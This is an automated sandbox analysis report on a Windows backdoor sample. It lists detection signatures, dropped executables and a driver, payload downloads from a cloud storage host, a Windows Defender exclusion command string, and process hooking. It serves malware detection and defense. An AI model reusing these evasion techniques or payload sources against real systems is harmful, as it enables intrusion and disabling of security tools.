Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e2664726330-76546233.05.exe

Overview

General Information

Sample name:e2664726330-76546233.05.exe
Analysis ID:1585824
MD5:b870e18fa5a2c9198e95c0d3b3b7dee3
SHA1:0fd94ac9b9cf07eef7db99096905c2e5d237d43c
SHA256:1c0a56b789c7f194c4f9b079e1192d600f48a832c748862415347963299ac075
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • e2664726330-76546233.05.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\e2664726330-76546233.05.exe" MD5: B870E18FA5A2C9198E95C0D3B3B7DEE3)
  • XXiUpO.exe (PID: 3916 cmdline: C:\Users\user\Documents\XXiUpO.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
5.2.XXiUpO.exe.2820000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: e2664726330-76546233.05.exeVirustotal: Detection: 7%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.6:49971 version: TLS 1.2
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: e2664726330-76546233.05.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe, 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XXiUpO.exe, 00000005.00000000.3122335570.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XXiUpO.exe.0.dr
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC09A1B8 FindFirstFileExW,5_2_00007FFDAC09A1B8
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DFFE
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDFF
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]5_2_0000000140011270
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DE96
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DEFB
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000E178
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: basdy1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: basdy1.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.000000000011F000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/AppData
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/J
Source: e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/a.gif
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/i.dat
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://basdy1.oss-cn-beijing.aliyuncs.com/i.datY
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: XXiUpO.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.6:49971 version: TLS 1.2

System Summary

barindex
Source: 5.2.XXiUpO.exe.2820000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000C3F05_2_000000014000C3F0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000CC005_2_000000014000CC00
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140001A305_2_0000000140001A30
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000C2A05_2_000000014000C2A0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400022C05_2_00000001400022C0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400110F05_2_00000001400110F0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140010CF05_2_0000000140010CF0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400093005_2_0000000140009300
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000BB705_2_000000014000BB70
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140003F805_2_0000000140003F80
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400103D05_2_00000001400103D0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC09A1B85_2_00007FFDAC09A1B8
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC0A02485_2_00007FFDAC0A0248
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\XXiUpO.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024351819.000000000A680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs e2664726330-76546233.05.exe
Source: e2664726330-76546233.05.exe, 00000000.00000000.2092461499.0000000141D7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBootstrapPackagedGame-Win64-Shipping.exeD vs e2664726330-76546233.05.exe
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs e2664726330-76546233.05.exe
Source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs e2664726330-76546233.05.exe
Source: e2664726330-76546233.05.exeBinary or memory string: OriginalFilenameBootstrapPackagedGame-Win64-Shipping.exeD vs e2664726330-76546233.05.exe
Source: 5.2.XXiUpO.exe.2820000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@2/12@1/1
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\XXiUpO.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].datJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: e2664726330-76546233.05.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: e2664726330-76546233.05.exeVirustotal: Detection: 7%
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile read: C:\Users\user\Desktop\e2664726330-76546233.05.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\e2664726330-76546233.05.exe "C:\Users\user\Desktop\e2664726330-76546233.05.exe"
Source: unknownProcess created: C:\Users\user\Documents\XXiUpO.exe C:\Users\user\Documents\XXiUpO.exe
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: e2664726330-76546233.05.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: e2664726330-76546233.05.exeStatic file information: File size 30941696 > 1048576
Source: e2664726330-76546233.05.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58400
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: e2664726330-76546233.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: e2664726330-76546233.05.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe, 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XXiUpO.exe, 00000005.00000000.3122335570.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XXiUpO.exe.0.dr
Source: e2664726330-76546233.05.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: e2664726330-76546233.05.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: e2664726330-76546233.05.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: e2664726330-76546233.05.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: e2664726330-76546233.05.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: e2664726330-76546233.05.exeStatic PE information: 0xC9C0AD62 [Mon Apr 5 11:28:34 2077 UTC]
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: e2664726330-76546233.05.exeStatic PE information: section name: _RDATA

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Users\user\Documents\XXiUpO.exeJump to dropped file
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Users\user\Documents\XXiUpO.exeJump to dropped file
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\XXiUpO.exeMemory written: PID: 3916 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
